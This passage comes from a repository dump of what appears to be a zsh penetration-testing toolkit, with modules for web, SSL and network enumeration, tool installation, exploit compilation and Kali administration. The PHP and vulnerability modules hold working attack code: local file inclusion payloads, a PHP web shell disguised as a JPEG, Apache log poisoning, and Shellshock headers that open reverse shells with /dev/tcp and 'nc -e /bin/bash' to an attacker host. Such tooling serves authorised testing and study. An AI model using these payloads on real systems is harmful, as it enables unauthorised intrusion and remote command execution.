\\\"${__URL}php://input%00\\\" \"\n}\n\nqq-enum-web-php-lfi-proc-self-environ() {\n    __ask \"URL should contain a URI like /page.php?lfi=\"\n    qq-vars-set-url\n    print -z \"curl -k -v -A \\\"<?=phpinfo(); ?>\\\" \\\"${__URL}../../../proc/self/environ\\\" \"\n}\n\nqq-enum-web-php-lfi-filter-resource(){\n    __ask \"URL should contain a URI like /page.php?lfi=\"\n    qq-vars-set-url\n    __ask \"Set path to a remote file\"\n    local f && __askvar f REMOTE_FILE\n    print -z \"curl -k -v -XGET \\\"${__URL}php://filter/convert.base64-encode/resource=${f}\\\" \"\n}\n\nqq-enum-web-php-lfi-zip-jpg-shell() {\n    __ask \"URL should contain a URI like /page.php?lfi=\"\n    qq-vars-set-url\n\n    echo \"<pre><?php system(\\$_GET['cmd']); ?></pre>\" > payload.php\n    zip payload.zip payload.php\n    mv payload.zip shell.jpg\n\n    __info \"Created shell.jpg\"\n    __warn \"First upload shell.jpg to target\"\n\n    print -z \"curl -k -v -XGET \\\"${__URL}zip://shell.jpg%23payload.php?cmd=\\\" \"\n}\n\nqq-enum-web-php-lfi-logfile() {\n    __ask \"URL should contain a URI like /page.php?lfi=\"\n    qq-vars-set-url\n    local b && __askvar b \"TARGET URL\"\n    curl -s \"${b}/<?php passthru(\\$_GET['cmd']); ?>\"\n    __info \"lfi request completed\"\n    print -z \"curl -k -v \\\"${__URL}../../../../../var/log/apache2/access.log&cmd=whoami\\\" \"\n}\n\nqq-enum-web-php-gen-htaccess() {\n    local e && __askvar e Extension\n    __ask \"Upload .htaccess file to make alt extension executable by PHP\"\n    print -z \"echo \\\"AddType application/x-httpd-php ${e}\\\" > htaccess\"\n}\n\nqq-enum-web-php-phpinfo() {\n    print -z \"echo \\\"<html><body><p>PHP INFO PAGE</p><br /><?php phpinfo(); ?></body></html>\\\" > phpinfo.php\"\n}"
  },
  {
    "path": "modules/qq-enum-web-ssl.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-ssl\n#############################################################\n\nqq-enum-web-ssl-help() {\n    cat << \"DOC\"\n\nqq-enum-web-ssl\n----------------\nThe enum-web-ssl namespace contains commands for enumerating SSL/TLS.\n\nCommands\n--------\nqq-enum-web-ssl-install:              installs dependencies\nqq-enum-web-ssl-tcpdump:              capture traffic to and from target\nqq-enum-web-ssl-der-to-crt:           convert a .der file to .crt\nqq-enum-web-ssl-crt-ca-install:       install a root certificate (.crt)\nqq-enum-web-ssl-certs:                display cert from a url\nqq-enum-web-ssl-cert-download:        download certs from a url\nqq-enum-web-ssl-testssl-full:\nqq-enum-web-ssl-testssl-ciphers:\n\nDOC\n}\n\nqq-enum-web-ssl-install() {\n    __info \"Running $0...\"\n    __pkgs curl nmap tcpdump openssl testssl\n}\n\nqq-enum-web-ssl-tcpdump() {\n    __check-project\n    qq-vars-set-iface\n    qq-vars-set-rhost\n    print -z \"tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 443 -w $(__hostpath)/ssl.pcap\"\n}\n\nqq-enum-web-ssl-der-to-crt() {\n    __ask \"Select the cacert.der file\"\n    local f && __askpath f FILE $(pwd)\n    print -z \"sudo openssl x509 -inform DER -in ${f} -out cacert.crt\"\n}\n\nqq-enum-web-ssl-crt-ca-install() {\n    __ask \"Select the cacert.crt file\"\n    local f && __askpath f FILE $(pwd)\n    print -z \"sudo cp ${f} /usr/local/share/ca-certificates/. 
&& sudo update-ca-certificates\"\n}\n\nqq-enum-web-ssl-certs() {\n    qq-vars-set-url\n    print -z \"openssl s_client -showcerts -connect ${__URL}:443\" \n}\n\nqq-enum-web-ssl-cert-download() {\n    __check-project\n    qq-vars-set-url\n\tlocal d=$(echo \"${__URL}\" | cut -d/ -f3)\n\tprint -z \"openssl s_client -servername ${d} -connect ${d}:443 </dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > $(__urlpath)/ssl.certificate.`date +\"%Y%m%d-%H%M%S\"`.pem\"\n}\n\nqq-enum-web-ssl-testssl-full() {\n    __check-project\n    qq-vars-set-url\n\tprint -z \"testssl --color=3 -oA $(__urlpath)/testssl.full.`date +\"%Y%m%d-%H%M%S\"` ${__URL} \"\n}\n\nqq-enum-web-ssl-testssl-ciphers() {\n    __check-project\n    qq-vars-set-url\n\tprint -z \"testssl -E --color=3 -oA $(__urlpath)/testssl.ciphers.`date +\"%Y%m%d-%H%M%S\"` ${__URL} \"\n}\n"
  },
  {
    "path": "modules/qq-enum-web-vuln.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-vuln\n#############################################################\n\nqq-enum-web-vuln-help() {\n    cat << \"DOC\"\n\nqq-enum-web-vuln\n----------------\nThe enum-web-vuln namespace contains commands for discovering web vulnerabilities.\n\nCommands\n--------\nqq-enum-web-vuln-install:              installs dependencies\nqq-enum-web-vuln-nikto:                scan a target for web vulnerabilities   \nqq-enum-web-vuln-nmap-rfi:             scan for potential rfi uri's\nqq-enum-web-vuln-shellshock-agent:     create a shellshock payload for user-agent\nqq-enum-web-vuln-shellshock-nc:        attempt shellshock with a reverse shell payload\nqq-enum-web-vuln-put-curl:             attempt to PUT a file with curl\nqq-enum-web-vuln-padbuster-check:      test for padbuster\nqq-enum-web-vuln-padbuster-forge:      exploit with padbuster\n\nDOC\n}\n\nqq-enum-web-vuln-install() {\n    __info \"Running $0...\"\n    __pkgs nikto curl nmap padbuster\n}\n\nqq-enum-web-vuln-nikto() {\n    __check-project\n    qq-vars-set-url\n    print -z \"nikto -useragent \\\"${__UA}\\\" -h \\\"${__URL}\\\" -o $(__urlpath)/nikto.txt\"\n}\n\nqq-enum-web-vuln-nmap-rfi() {\n    qq-vars-set-rhost\n    print -z \"nmap -vv -n -Pn -p80 --script http-rfi-spider --script-args http-rfi-spider.url='/' ${__RHOST}\"\n}\n\nqq-enum-web-vuln-shellshock-agent() {\n    qq-vars-set-lhost\n    qq-vars-set-lport\n    __ok \"Copy the header value below to use in your exploit\"\n    cat << DOC\n\nUser-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/${__LHOST}/${__LPORT} 0>&1\n\nDOC\n}\n\nqq-enum-web-vuln-shellshock-nc() {\n    qq-vars-set-lhost\n    qq-vars-set-lport\n    qq-vars-set-rhost\n    __warn \"Start a netcat listener for ${__LHOST}:${__LPORT}\"\n    print -z \"curl -A '() { :; }; /bin/bash -c \\\"/usr/bin/nc ${__LHOST} ${__LPORT} -e /bin/bash\\\"' 
\\\"http://${__RHOST}/cgi-bin/status\\\"\"\n}\n\nqq-enum-web-vuln-put-curl() {\n    qq-vars-set-rhost\n    local f && __askpath f FILE $(pwd)\n    print -z \"curl -L -T ${f} \\\"http://${__RHOST}/${f}\\\" \"\n}\n\nqq-enum-web-vuln-padbuster-check() {\n    qq-vars-set-rhost\n    local cn && __askvar cn \"COOKIE NAME\"\n    local cv && __askvar cv \"COOKIE VALUE\"\n    print -z \"padbuster ${__RHOST} ${cv} 8 -cookies ${cn}=${cv} -encoding 0\"\n}\n\nqq-enum-web-vuln-padbuster-forge() {\n    qq-vars-set-rhost\n    local cn && __askvar cn \"COOKIE NAME\"\n    local cv && __askvar cv \"COOKIE VALUE\"\n    __check-user\n    print -z \"padbuster ${__RHOST} ${cv} 8 -cookies ${cn}=${cv} -encoding 0 -plaintext user=${__USER}\"\n}"
  },
  {
    "path": "modules/qq-enum-web.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web\n#############################################################\n\nqq-enum-web-help() {\n    cat << \"DOC\"\n\nqq-enum-web\n-----------\nThe qq-enum-web namespace contains commands for scanning and enumerating\nhttp services.\n\nCommands\n--------\nqq-enum-web-install:                installs dependencies\nqq-enum-web-tcpdump:                capture traffic to and from a host\nqq-enum-web-nmap-sweep:             nmap sweep scan to discover web servers on a network\nqq-enum-web-whatweb:                enumerate web server and platform information\nqq-enum-web-waf:                    enumerate WAF information\nqq-enum-web-vhosts-gobuster:        brute force for virtual hosts\nqq-enum-web-eyewitness:             scrape screenshots from target URL\nqq-enum-web-wordpress:              enumerate Wordpress information\nqq-enum-web-headers:                grab headers from a target url using curl\nqq-enum-web-mirror:                 mirrors the target website locally\n\nDOC\n}\n\nqq-enum-web-install() {\n    __info \"Running $0...\"\n    __pkgs tcpdump nmap whatweb wafw00f gobuster eyewitness wpscan wget curl seclists wordlists \n    go get -u github.com/jaeles-project/gospider\n    go get -u github.com/hakluke/hakrawler\n}\n\nqq-enum-web-nmap-sweep() {\n    __check-project\n    qq-vars-set-network\n    print -z \"sudo nmap -n -Pn -sS -p80,443,8080 ${__NETWORK} -oA $(__netpath)/web-sweep\"\n}\n\nqq-enum-web-tcpdump() {\n    __check-project\n    qq-vars-set-iface\n    qq-vars-set-rhost\n    print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 80 -w $(__hostpath)/web.pcap\"\n}\n\nqq-enum-web-whatweb() {\n    __check-project\n    qq-vars-set-url\n    print -z \"whatweb ${__URL} -a 3 | tee $(__urlpath)/whatweb.txt\"\n}\n\nqq-enum-web-waf() {\n    __check-project\n    qq-vars-set-url\n    print -z \"wafw00f ${__URL} -o $(__urlpath)/waf.txt\"\n}\n\n# 
vhosts\n\nqq-enum-web-vhosts-gobuster() {\n    __check-project\n    qq-vars-set-url\n    local w && __askpath w FILE /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt\n    __check-threads\n    print -z \"gobuster vhost -u ${__URL} -w ${w} -a \\\"${__UA}\\\" -t ${__THREADS} -o $(__urlpath)/vhosts.txt\"\n}\n\n# screens\n\nqq-enum-web-eyewitness() {\n    __check-project\n    qq-vars-set-url\n    mkdir -p $(__urlpath)/screens\n    print -z \"eyewitness --web --no-dns --no-prompt --single ${__URL} -d $(__urlpath)/screens --user-agent \\\"${__UA}\\\" \"\n}\n\n# apps\n\nqq-enum-web-wordpress() {\n    __check-project\n    qq-vars-set-url\n    print -z \"wpscan --ua \\\"${__UA}\\\" --url ${__URL} --enumerate tt,vt,u,vp -o $(__urlpath)/wpscan.txt\"\n}\n\nqq-enum-web-headers() {\n    __check-project\n    qq-vars-set-url\n    print -z \"curl -s -X GET -I -L -A \\\"${__UA}\\\" \\\"${__URL}\\\" | tee $(__urlpath)/headers.txt\"\n}\n\nqq-enum-web-mirror() {\n    __warn \"The destination site will be mirrored in the current directory\"\n    qq-vars-set-url\n    print -z \"wget -mkEpnp ${__URL} \"\n}\n\nqq-enum-web-gospider() {\n    __check-project\n    qq-vars-set-url\n    print -z \"gospider -s \\\"${__URL}\\\" -o $(__urlpath)/spider.txt\"\n}\n\nqq-enum-web-hakrawler() {\n    __check-project\n    qq-vars-set-url\n    local d && __askvar d DEPTH\n    print -z \"hakrawler -url \\\"${__URL}\\\" -depth ${d} -linkfinder -usewayback | tee $(__urlpath)/hakrawler.txt\"\n}\n"
  },
  {
    "path": "modules/qq-exploit.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-exploit\n#############################################################\n\nqq-exploit-help() {\n    cat << \"DOC\"\n\nqq-exploit\n----------\nThe exploit namespace provides commands that assist with compilation and\ncross-compilation commands for exploits.\n\nCommands\n--------\nqq-exploit-install:               installs dependencies\nqq-exploit-searchsploit-nmap:     use searchsploit with an nmap xml results file\nqq-exploit-compile-gcc:           compile a linux exploit\nqq-exploit-compile-gcc-32:        compile a linux 32 exploit on 64\nqq-exploit-compile-c-win32:       cross compile a C win32 exploit\nqq-exploit-compile-c-win64:       cross compile a C win64 exploit\nqq-exploit-compile-c++-win32:     cross compile a C++ win32 exploit\nqq-exploit-compile-c++-win64:     cross compile a C++ win64 exploit\n\nDOC\n}\n\nqq-exploit-install() {\n    __info \"Running $0...\"\n    sudo dpkg --add-architecture i386\n    sudo apt-get update\n    __pkgs exploitdb\n    __pkgs mingw-w64 gcc gcc-multilib g++-multilib\n}\n\nqq-exploit-searchsploit-nmap() {\n    __check-project\n    __ask \"Select nmap xml scan results file\"\n    local f && __askpath f FILE ${__PROJECT}\n    print -z \"searchsploit -x --nmap ${f}\"\n}\n\nqq-exploit-compile-gcc() {\n    __check-project\n    mkdir -p ${__PROJECT}/exploits\n    local src && __askpath src SOURCE ${__PROJECT}/exploits\n    local out && __askpath out OUTPUT ${__PROJECT}/exploits\n    print -z \"gcc -o ${out} ${src}\"\n}\n\nqq-exploit-compile-gcc-32() {\n    __check-project\n    mkdir -p ${__PROJECT}/exploits\n    local src && __askpath src SOURCE ${__PROJECT}/exploits\n    local out && __askpath out OUTPUT ${__PROJECT}/exploits\n    print -z \"gcc -m32 -o ${out} ${src}\"\n}\n\nqq-exploit-compile-c-win32() {\n    __check-project\n    mkdir -p ${__PROJECT}/exploits\n    local src && __askpath src SOURCE ${__PROJECT}/exploits\n    
local out && __askpath out OUTPUT ${__PROJECT}/exploits\n    print -z \"i686-w64-mingw32-gcc ${src} -o ${out}\"\n}\n\nqq-exploit-compile-c-win64() {\n    __check-project\n    mkdir -p ${__PROJECT}/exploits\n    local src && __askpath src SOURCE ${__PROJECT}/exploits\n    local out && __askpath out OUTPUT ${__PROJECT}/exploits\n    print -z \"x86_64-w64-mingw32-gcc ${src} -o ${out}\"\n}\n\nqq-exploit-compile-c++-win32() {\n    __check-project\n    mkdir -p ${__PROJECT}/exploits\n    local src && __askpath src SOURCE ${__PROJECT}/exploits\n    local out && __askpath out OUTPUT ${__PROJECT}/exploits\n    print -z \"i686-w64-mingw32-g++ ${src} -o ${out}\"\n}\n\nqq-exploit-compile-c++-win64() {\n    __check-project\n    mkdir -p ${__PROJECT}/exploits\n    local src && __askpath src SOURCE ${__PROJECT}/exploits\n    local out && __askpath out OUTPUT ${__PROJECT}/exploits\n    print -z \"x86_64-w64-mingw32-g++ ${src} -o ${out}\"\n}\n\nqq-exploit-compile-notes-winsock() {\n    __info \"use -lws2_32\"\n}\n\nqq-exploit-compile-notes-static() {\n    __info \"-static-libstdc++\"\n    __info \"-static-libgcc\"\n}\n"
  },
  {
    "path": "modules/qq-install.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-install\n#############################################################\n\nqq-install-help() {\n    cat << \"DOC\"\n\nqq-install\n----------\nThe qq-install namespace provides commands that assist with installing\npackages, repos and tools used in quiver.\n\nCommands\n--------\nqq-install-all:                Installs all dependencies in all modules, calling qq-*-install \nqq-install-git-pull-tools:     Updates all installed tools that are git repos\nqq-install-dev:                Installs python3, php, npm and libraries\nqq-install-essentials:         Installs useful utilities\nqq-install-golang:             Installs golang and environment variables needed for \"go get\"\n\nTools\n-----\nThese installers are for individual tools.\n\nqq-install-wordlist-commonspeak\nqq-install-wordlist-nerdlist\nqq-install-massdns\nqq-install-github-search\nqq-install-s3scanner\nqq-install-git-secrets\nqq-install-gitrob\nqq-install-pentest-tools\nqq-install-protonvpn\nqq-install-nmap-elasticsearch-nse\nqq-install-link-finder\nqq-install-bat\n\nDOC\n}\n\n##### Helpers\n\n__addpath() {\n    echo \"export PATH=\\$PATH:$1\" | tee -a ~/.zshrc\n    export PATH=$PATH:$1\n}\n\n__pkgs(){\n    __info \"checking for and installing dependencies...\"\n    for pkg in \"$@\"\n    do\n    __info \"$pkg\"\n        dpkg -l | grep -qw $pkg && __warn \"already installed\" || sudo apt-get -y install $pkg\n    done \n}\n\nqq-install-all() {\n    __cyan \"This will install/update all modules.\"\n    __cyan \"Ensure you have free disk space before proceeding.\"\n    __ask \"CONTINUE?\"\n    if __check-proceed\n    then\n        __info \"Installing all modules...\"\n        #qq-encoding-install\n        qq-enum-dhcp-install\n        qq-enum-dns-install\n        qq-enum-ftp-install\n        qq-enum-host-install\n        qq-enum-kerb-install\n        qq-enum-ldap-install\n        qq-enum-mssql-install\n      
  qq-enum-mysql-install\n        qq-enum-network-install\n        qq-enum-nfs-install\n        qq-enum-oracle-install\n        qq-enum-pop3-install\n        qq-enum-rdp-install\n        qq-enum-smb-install\n        qq-enum-web-aws-install\n        qq-enum-web-dirs-install\n        qq-enum-web-elastic-install\n        qq-enum-web-fuzz-install\n        qq-enum-web-js-install\n        qq-enum-web-vuln-install\n        qq-enum-web-php-install\n        qq-enum-web-ssl-install\n        qq-enum-web-install\n        qq-exploit-install\n        #qq-kali-install\n        qq-notes-install\n        qq-log-install\n        qq-pivot-install\n        qq-project-install\n        qq-recon-domains-install\n        qq-recon-github-install\n        qq-recon-networks-install\n        qq-recon-org-install\n        qq-recon-subs-install\n        qq-shell-handlers-msf-install\n        qq-shell-handlers-install\n        #qq-shell-tty-install\n        qq-srv-install\n        __info \"Install finished\"\n    fi\n}\n\nqq-install-git-pull-tools() {\n    __cyan \"This will git-pull all repos in ${__TOOLS}.\"\n    __ask \"CONTINUE?\"\n    if __check-proceed\n    then\n    cd ${__TOOLS}\n    for d in $(ls -d */)\n    do \n        cd $d\n        __ok \"Pulling ${d}\"\n        git pull \n        cd -\n    done\n    cd ${__TOOLS}\n    fi\n}\n\nqq-install-dev(){\n    __cyan \"This will install python3, php, npm and libraries.\"\n    __ask \"CONTINUE?\"\n    if __check-proceed\n    then\n        __pkgs python3 python3-pip php php-curl libldns-dev libssl-dev libcurl4-openssl-dev npm\n    fi\n}\n\nqq-install-essentials(){\n    __cyan \"This will install common utilities such as jq, tmux, tree, dtach and more.\"\n    __ask \"CONTINUE?\"\n    if __check-proceed\n    then\n        __pkgs jq pigz fonts-powerline unzip tmux dtach tree\n    fi\n}\n\n##### Individual Tools\n\nqq-install-golang() {\n    __pkgs golang\n\n    if [[ -z \"$(echo $GOPATH)\" ]]\n    then\n        echo \"export GOPATH=\\$HOME/go\" | tee -a $HOME/.zshrc\n  
      echo \"export PATH=\\$PATH:/usr/local/go/bin:\\$GOPATH/bin\" | tee -a $HOME/.zshrc\n        export GOPATH=$HOME/go\n        export PATH=$PATH:/usr/local/go/bin:$HOME/go/bin\n    fi \n}\n\nqq-install-node() {\n    __pkgs nodejs npm\n\n    cd $HOME\n    mkdir -p $HOME/.npm-global\n    npm config set prefix '~/.npm-global'\n\n    if ! $(echo $PATH | grep -q \"npm-global\")\n    then\n        echo \"export PATH=\\$PATH:\\$HOME/.npm-global\" | tee -a $HOME/.zshrc\n        export PATH=$PATH:$HOME/.npm-global\n    fi\n}\n\nqq-install-wordlist-commonspeak() {\n    local name=\"commonspeak2\"\n    local url=\"https://github.com/assetnote/commonspeak2-wordlists.git\"\n    local p=\"$__TOOLS/$name\"\n\n    __info \"$name\"\n\n    if [[ ! -d $p ]]\n    then\n        git clone $url $p\n    else\n        __warn \"already installed in $p\"\n        pushd $p \n        git pull\n        popd\n    fi\n}\n\nqq-install-wordlist-nerdlist() {\n    local name=\"nerdlist\"\n    local url=\"https://github.com/tarahmarie/nerdlist.git\"\n    local p=\"$__TOOLS/$name\"\n\n    __info \"$name\"\n\n    if [[ ! -d $p ]]\n    then\n        git clone $url $p\n    else\n        __warn \"already installed in $p\"\n        pushd $p \n        git pull\n        popd\n    fi\n}\n\nqq-install-massdns() {\n    local name=\"massdns\"\n    local url=\"https://github.com/blechschmidt/massdns.git\"\n    local p=\"$__TOOLS/$name\"\n\n    __info \"$name\"\n\n    if [[ ! -d $p ]]\n    then\n        git clone $url $p\n\n        #after commands\n        pushd $p\n        make\n        popd\n        __addpath $p/bin\n    else\n        __warn \"already installed in $p\"\n        pushd $p \n        git pull\n        make\n        popd\n    fi\n}\n\nqq-install-github-search() {\n    local name=\"github-search\"\n    local url=\"https://github.com/gwen001/github-search.git\"\n    local p=\"$__TOOLS/$name\"\n\n    __info \"$name\"\n\n    if [[ ! 
-d $p ]]\n    then\n        git clone $url $p\n\n        #after commands\n        pushd $p\n        pip3 install -r requirements.txt\n        popd\n        __addpath $p\n    else\n        __warn \"already installed in $p\"\n        pushd $p \n        git pull\n        pip3 install -r requirements.txt\n        popd\n    fi\n}\n\nqq-install-s3scanner() {\n    local name=\"S3Scanner\"\n    local url=\"https://github.com/sa7mon/S3Scanner.git\"\n    local p=\"$__TOOLS/$name\"\n\n    __info \"$name\"\n\n    if [[ ! -d $p ]]\n    then\n        git clone $url $p\n\n        #after commands\n        pushd $p\n        pip3 install -r requirements.txt\n        popd\n        __addpath $p\n    else\n        __warn \"already installed in $p\"\n        pushd $p \n        git pull\n        pip3 install -r requirements.txt\n        popd\n    fi\n}\n\nqq-install-gf() {\n    local name=\"gf\"\n\n    __info \"$name\"\n\n    go get -u github.com/tomnomnom/gf\n    echo \"source \\$GOPATH/src/github.com/tomnomnom/gf/gf-completion.zsh\" >> $HOME/.zshrc\n    cp -r $GOPATH/src/github.com/tomnomnom/gf/examples $HOME/.gf\n\n}\n\nqq-install-git-secrets() {\n    local name=\"git-secrets\"\n    local url=\"https://github.com/awslabs/git-secrets.git\"\n    local p=\"$__TOOLS/$name\"\n\n    __info \"$name\"\n\n    if [[ ! 
-d $p ]]\n    then \n        git clone $url $p\n\n        #after commands\n        pushd $p\n        sudo make install\n        popd\n        __addpath $p\n\n    else\n        __warn \"already installed in $p\"\n        pushd $p \n        git pull\n        sudo make install\n        popd\n    fi\n}\n\nqq-install-gitrob() {\n\n    local name=\"gitrob\"\n\n    __info \"$name\"\n\n    go get -u github.com/golang/dep/cmd/dep\n    go get -u github.com/codeEmitter/gitrob\n    pushd ~/go/src/github.com/codeEmitter/gitrob\n    dep ensure\n    go build\n    popd\n\n}\n\nqq-install-pentest-tools() {\n    local name=\"pentest-tools\"\n    local url=\"https://github.com/gwen001/pentest-tools.git\"\n    local p=\"$__TOOLS/$name\"\n\n    __info \"$name\"\n\n    if [[ ! -d $p ]]\n    then\n        git clone $url $p\n\n        #after commands\n        __addpath $p\n\n    else\n        __warn \"already installed in $p\"\n        pushd $p \n        git pull\n        popd\n    fi\n}\n\nqq-install-protonvpn() {\n    local name=\"protonvpn\"\n    __info \"$name\"\n\n    sudo apt install -y openvpn dialog python3-pip python3-setuptools\n    sudo pip3 install protonvpn-cli\n    __warn \"ProtonVPN username and password required\"\n    print -z \"sudo protonvpn init\"\n}\n\nqq-install-nmap-elasticsearch-nse() {\n    local name=\"nmap-elasticsearch-nse\"\n    local url=\"https://github.com/theMiddleBlue/nmap-elasticsearch-nse.git\"\n    local p=\"$__TOOLS/$name\"\n\n    __info \"$name\"\n\n    if [[ ! 
-d $p ]]\n    then\n        git clone $url $p\n\n        #after commands\n        pushd $p\n        sudo cp elasticsearch.nse /usr/share/nmap/scripts/\n        popd\n\n    else\n        __warn \"already installed in $p\"\n        pushd $p \n        git pull\n        sudo cp elasticsearch.nse /usr/share/nmap/scripts/\n        popd\n    fi\n}\n\nqq-install-link-finder() {\n    local name=\"LinkFinder\"\n    local url=\"https://github.com/GerbenJavado/LinkFinder.git\"\n    local p=\"$__TOOLS/$name\"\n\n    __info \"$name\"\n\n    if [[ ! -d $p ]]\n    then\n        git clone $url $p\n\n        #after commands\n        pushd $p \n        sudo python3 setup.py install\n        pip3 install -r requirements.txt \n        popd\n\n    else\n        __warn \"already installed in $p\"\n        pushd $p \n        git pull\n        python3 setup.py install\n        pip3 install -r requirements.txt \n        popd\n    fi\n}\n\nqq-install-bat() {\n    local name=\"bat\"\n    __info \"$name\"\n\n    cd $HOME\n    wget https://github.com/sharkdp/bat/releases/download/v0.15.0/bat_0.15.0_amd64.deb \n    sudo dpkg -i bat_0.15.0_amd64.deb\n    rm bat_0.15.0_amd64.deb\n    cd -\n}\n\n"
  },
  {
    "path": "modules/qq-kali.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-kali\n#############################################################\n\nqq-kali-help() {\n    cat << \"DOC\"\n\nqq-kali\n----------\nThe qq-kali namespace provides commands that assist with managing Kali linux.\n\nCommands\n--------\nqq-kali-pkg-upgrade:          update and full-upgrade with autoremove\nqq-kali-pkg-query:            query if a package is installed or not  \nqq-kali-pkg-fix:              fix broken packages\nqq-kali-pkg-go-update:        update go modules and packages with go get\nqq-kali-fs-mounted:           show mounted file systems\nqq-kali-fs-usage:             show file system usage totals\nqq-kali-fs-last3:             show files modified in last 3 days in /etc\nqq-kali-fs-large:             show files larger than 1GB in the root fs\nqq-kali-mem-top10:            show top10 processes by memory usage\nqq-kali-mem-free:             show overall memory usage\nqq-kali-disk-top10:           show top 10 files by size in current directory\nqq-kali-ps-tree:              show a process tree\nqq-kali-ps-grep:              search list of processes\nqq-kali-ps-dtach:             run a script in the background\nqq-kali-net-watch:            display network active connections\nqq-kali-net-open4:            display open network connections ipv4\nqq-kali-net-open6:            display open network connections ipv6\nqq-kali-net-routes:           display the system routing table\nqq-kali-net-ss:               display open network connections\nqq-kali-net-lsof:             display open network connections\nqq-kali-net-pubip:            query for the public IP\nqq-kali-pvpn-update:          install or update proton vpn cli\nqq-kali-pvpn-status:          check proton vpn status\nqq-kali-pvpn-connect-tcp:     connect to proton vpn using tcp\nqq-kali-pvpn-connect-udp:     connect to proton vpn using udp\nqq-kali-pvpn-disconnect:      disconnect proton 
vpn\nqq-kali-path-add:             add a new path to the PATH environment variable\nqq-kali-file-replace:         replace an existing value in a file\nqq-kali-file-dos-to-unix:     convert file with dos endings to unix\nqq-kali-file-unix-to-dos:     convert file with unix endings to dos\nqq-kali-file-sort-uniq:       sort a file uniq in place \nqq-kali-file-sort-uniq-ip:    sort a file of IP addresses uniq in place\nqq-kali-sudoers-easy:         removes the requirement for sudo for common commands like nmap\nqq-kali-sudoers-harden:       removes sudo exclusions\n\nDOC\n}\n\nqq-kali-pkg-upgrade() { print -z \"sudo apt-get update && sudo apt-get full-upgrade && sudo apt-get autoremove\" }\n\nqq-kali-pkg-query() {\n    local query && __askvar query PACKAGE \n    for pkg in \"${query}\"\n    do\n    dpkg -l | grep -qw $pkg && __ok \"${pkg} is installed\" || __warn \"${pkg} not installed\"\n    done \n}\n\nqq-kali-pkg-fix() { print -z \"sudo apt-get install --fix-broken && sudo apt-get autoremove && sudo apt-get update\" }\n\nqq-kali-pkg-go-update() { print -z \"go get -u all\" }\n\nqq-kali-fs-mounted() { print -z \"sudo mount | column -t\" }\n\nqq-kali-fs-usage() { print -z \"df -mTh --total\" }\n\nqq-kali-fs-last3() { print -z \"sudo find /etc -mtime -3\" }\n\nqq-kali-fs-large() { print -z \"sudo find / -type f -size +1G\" }\n\nqq-kali-mem-top10() { print -z \"sudo ps aux | sort -rk 4,4 | head -n 10 | awk '{print \\$4,\\$11}' \" }\n\nqq-kali-mem-free() { print -z \"free -th\" }\n\nqq-kali-disk-top10() { print -z \"sudo du -sk ./* | sort -r -n | head -10\" }\n\nqq-kali-ps-tree() { print -z \"ps auxf\" }\n\nqq-kali-ps-grep() { \n    local query && __askvar query QUERY \n    print -z \"ps aux | grep -v grep | grep -i -e VSZ -e ${query}\" \n}\n\nqq-kali-ps-dtach() { \n    __ask \"Enter full path to script to run dtach'd\"\n    local p && __askpath p PATH $(pwd)\n    dtach -A ${p} /bin/zsh \n}\n\nqq-kali-net-watch() { print -z \"sudo watch -n 0.3 'netstat -pantlu4 | grep 
\\\"ESTABLISHED\\|LISTEN\\\"' \" }\n\nqq-kali-net-open4() { print -z \"sudo netstat -pantlu4\"}\n\nqq-kali-net-open6() { print -z \"sudo netstat -pantlu6\"}\n\nqq-kali-net-routes() { print -z \"netstat -r --numeric-hosts\" }\n\nqq-kali-net-ss() { print -z \"sudo ss -plaunt4\" }\n\nqq-kali-net-lsof() { print -z \"sudo lsof -P -i -n \"}\n\nqq-kali-net-pubip() { print -z \"curl -s \\\"https://icanhazip.com\\\" \"}\n\nqq-kali-pvpn-update() { print -z \"sudo pip3 install protonvpn-cli --upgrade\" }\n\nqq-kali-pvpn-status() { print -z \"sudo protonvpn status\" }\n\nqq-kali-pvpn-connect-tcp() { print -z \"sudo protonvpn c -f\" }\n\nqq-kali-pvpn-connect-udp() { print -z \"sudo protonvpn c -f -p udp\" }\n\nqq-kali-pvpn-disconnect() { print -z \"sudo protonvpn disconnect\" }\n\nqq-kali-path-add() { \n    __ask \"Enter new path to append to current PATH\"\n    local p && __askpath p PATH /   \n    print -z \"echo \\\"export PATH=\\$PATH:${p}\\\" | tee -a $HOME/.zshrc\" \n}\n\nqq-kali-file-replace() {\n    local replace && __askvar replace REPLACE\n    local with && __askvar with WITH\n    local file && __askpath file FILE $(pwd)\n    # sed -i edits in place; redirecting the output of sed onto its input file truncates it before it is read\n    print -z \"sed -i 's/${replace}/${with}/g' ${file}\"\n} \n\nqq-kali-file-dos-to-unix() { \n    local file=$1 \n    [[ -z \"${file}\" ]] && __askpath file FILE $(pwd)\n    print -z \"tr -d \\\"\\015\\\" < ${file} > ${file}.unix\"\n}\n\nqq-kali-file-unix-to-dos() {\n    local file=$1 \n    [[ -z \"${file}\" ]] && __askpath file FILE $(pwd)\n    print -z \"sed -e 's/$/\\r/' ${file} > ${file}.dos\"\n}\n\nqq-kali-file-sort-uniq() {\n    local file=$1 \n    [[ -z \"${file}\" ]] && __askpath file FILE $(pwd)\n    print -z \"cat ${file} | sort -u -o ${file}\"\n}\n\nqq-kali-file-sort-uniq-ip() { \n    local file=$1 \n    [[ -z \"${file}\" ]] && __askpath file FILE $(pwd)\n    print -z \"cat ${file} | sort -u | sort -V -o ${file}\"\n}\n\nqq-kali-sudoers-easy() {\n    __warn \"This is dangerous for OPSEC! 
Remove when done.\"\n    print -z \"echo \\\"$USER ALL=(ALL:ALL) NOPASSWD: /usr/bin/nmap, /usr/bin/masscan, /usr/sbin/tcpdump\\\" | sudo tee /etc/sudoers.d/$(whoami)\"\n}\nalias easymode=\"qq-kali-sudoers-easy\"\n\nqq-kali-sudoers-harden() {\n    print -z \"sudo rm /etc/sudoers.d/$(whoami)\"\n}\nalias hardmode=\"qq-kali-sudoers-harden\"\n"
  },
  {
    "path": "modules/qq-log.zsh",
